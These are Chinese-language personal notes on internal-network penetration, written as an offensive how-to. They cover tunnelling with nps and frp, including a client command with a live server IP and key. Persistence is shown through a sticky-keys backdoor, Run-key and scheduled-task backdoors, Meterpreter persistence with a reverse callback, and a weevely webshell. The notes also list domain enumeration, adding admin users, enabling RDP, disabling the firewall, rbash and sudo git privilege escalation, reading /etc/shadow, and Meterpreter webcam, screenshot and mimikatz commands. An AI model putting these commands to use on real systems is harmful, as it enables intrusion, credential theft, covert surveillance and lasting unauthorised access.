内网渗透专题

隧道搭建

①regeorg+proxifier搭建
这个有些问题,代理过不了
②nps映射出网
nps的思路

注意事项
下载链接

①下载版本是win_amd64 不是dwrwin
②客户端启动思路
npc.exe -server=121.36.106.169:8024 -vkey=basdefsvzmw8fjgi -type=tcp

③frp隧道
两台机器相通(多少台就多少台映射就好了)如果2台机器都和一台通但本身不通,做双层代理就好了
如 10.10.10.44————>映射到192.168.1.18–>110.40.180.28
方法：
10.10.10.44机器上配置 两台机器都要有frp

192.168.1.18

③viper炫彩蛇内网渗透
viper炫彩蛇内网渗透

内网信息收集攻击

一,内网渗透信息收集总结

拿下shell后一般干的事情

内网信息收集

判断所处网络,定位关键目标方法
通过netscan 进行扫描获取

域组信息收集总结
代理–>利用pingtunnel进行代理

利用zerologon打域控

rdp获取密码的方法

二,权限维持专题

1.)利用粘滞键进行权限维持

##①调出粘滞键
粘滞键后门 在windows上连续按5次“Shift”，就可以调出粘滞键
#②执行命令-->作用将粘滞键替换为system权限
cd windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
#③再次调出粘滞键
现在我们连续按下5次shift就弹出一个system权限的cmd

注意事项

①如果目标机是 winvista 以上的，即 winvista 以后出的系统，修改 sethc 会提示需要 trustedinstaller 权限，所以想要继续，那就需要修改所有者为Administrator，并修改其权限：
设置为完全控制

2.)注册表注入后门

直接执行该命令
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"
当管理员重新登录系统时，就会执行后门程序

3.)计划任务后门

#命令:
schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1
#以上的命令会在每小时执行一次shell.exe，在win7及以下的系统使用at命令代替schtasks

4.)meterpreter后门

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 
自动启动一个匹配的
exploit / multi / handler来连接到代理 -L 如果未使用％TEMP％，则在目标主机中写入有效负载的位置。
-P 有效负载使用，默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动该木马（具有SYSTEM权限） 
-T 要使用的备用可执行模板 
-U 用户登录时自动启动该木马 
-X 系统引导时自动启动该木马 
-h 这个帮助菜单 
-i 每次连接尝试之间的时间间隔（秒） 
-p 运行Metasploit的系统正在侦听的端口 
-r 运行Metasploit监听连接的系统的IP

5.)web后门–>基于weevely

①利用weevely生成一个php类型的马
②将文件放入服务器目录下,然后执行
weevely http://192.168.220.1/shell.php
③直接执行windows的shell命令即可
如 whoami命令

帮助命令

audit.etcpasswd | 枚举/etc/passwd 
audit.userfiles | 列举用户/home下具有权限的文件 
audit.mapwebfiles | 枚举任意Web站点的URL链接 
shell.php | 编写php文件 
shell.sh | 编写系统脚本 
system.info | 收集系统信息 
find.suidsgid | 查找SUID / SGID文件和目录 
find.perms | 查找权限可读/写/可执行文件和目录 
backdoor.tcp | TCP端口后门 
backdoor.reversetcp | 反弹TCP连接 
bruteforce.sql | 爆破指定数据库用户名密码 
bruteforce.sqlusers | 爆破所有数据库用户密码 
file.upload | 上传本地文件 
file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件 
file.read | 读文件 
file.rm | 删除文件 
file.check | 检查远程文件的状态（md5值，大小，权限等） 
file.download | 下载远程二进制/ ASCII文件到本地 
sql.console | 启动SQL控制台 
sql.dump | 备份数据库，即脱库
net.scan | 端口扫描
net.phpproxy | 安装远程php代理　
net.ifaces | 显示远程主机网络接口信息 
net.proxy | 安装隧道通信代理

三,windows命令

①维持域渗透命令

查看机器属于什么域
net config Workstation

查询有几个域, 查询域列表 
net view /domain

查看域控制器主机名
net group "domain controllers" /domain
查询域管理用户
net group "domain admins" /domain
查询域用户列表
net user /domain
查看当前域内机器主机名
net view
查询域内所有计算机主机名
net group "domain computers" /domain

常用命令
1.net user admin admin /add 添加用户的
2. net localgroup administrators admin /add 添加到域的
3.netstat -an 查看端口的
4.强制3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.关闭防火墙
netsh advfirewall set allprofiles state off
6.credssp加密问题 (3389连接连接不上的时候,可以用这个连接)
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 00000002 /f

②连接命令

ssh连接方法

ssh tom@127.127.0.0 -p 7744
#即连接方法

ftp

ftp-->（连接方法）
	①启动ftp
	②open +ip
	③user 即可连接

telnet

telnet（注意使用的话,需要启用windows功能中的telnet客户端）
	使用方法（与ftp有点类似）
		telnet ip 端口
		open（即开始连接）

连接ssh以及ftp类方法

连接不上原因–>服务端的ssh版本过老导致

Unable to negotiate with 172.16.255.253 port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael-cbc@lysator.liu.se

Linux账户提权

rbash限制权限

如果用户进入后发觉无权限
即反复爆

-rbash

提权方法

BASH_CMDS[a]=/bin/sh;a 
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
#即可提部分权限

linux基础命令以及账号限制提权权限类

linux常用基础命令
方法:典型切换账号进行提权即可

如从tom账号切换到jerry账号

#切换账号命令
su jerry
#然后输入密码即可

提权

sudo -l 
#进行-->查看该用户可对什么目录进行操作
#然后利用该目录进行提权即可

如git提权类状况特点

sudo git help config#先输入这个
	!/bin/bash#或者！'sh'完成提权
	#在输入!/bin/bash进行提取即可

sudo git  -p help
	!/bin/bash

成功提权为root

linux提取的几种典型方法

linux横向收集方法

#①基础命令
cat ../../../../etc/passwd
cat ../../../etc/shadow
cat ~/.bash_history
②组合使用
cat /etc/shadow | grep ***  #寻找自己想要用户的密码值
authconfig --test | grep hashing #判断加密方式

组合运用

windows系统内网渗透
常见命令
msf工具攻击命令常用

①截屏
screenshot
②开启摄像头且拍照
webcam_stream #通过摄像头开启视频
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照 
③获取管理员密码mimikatz模块使用
load mimikatz
https://blog.csdn.net/weixin_45116657/article/details/103147716
④hashdump获取hash值类
然后拿hash解密即可登录
⑤后渗透的常见命令
https://blog.csdn.net/qq_46717339/article/details/113804776
⑥添加3389
enable_rdp脚本开启3389
run post/windows/manage/enable_rdp
添加新的用户用于登录
run post/windows/manage/enable_rdp USERNAME=WWW PASSWORD=WWW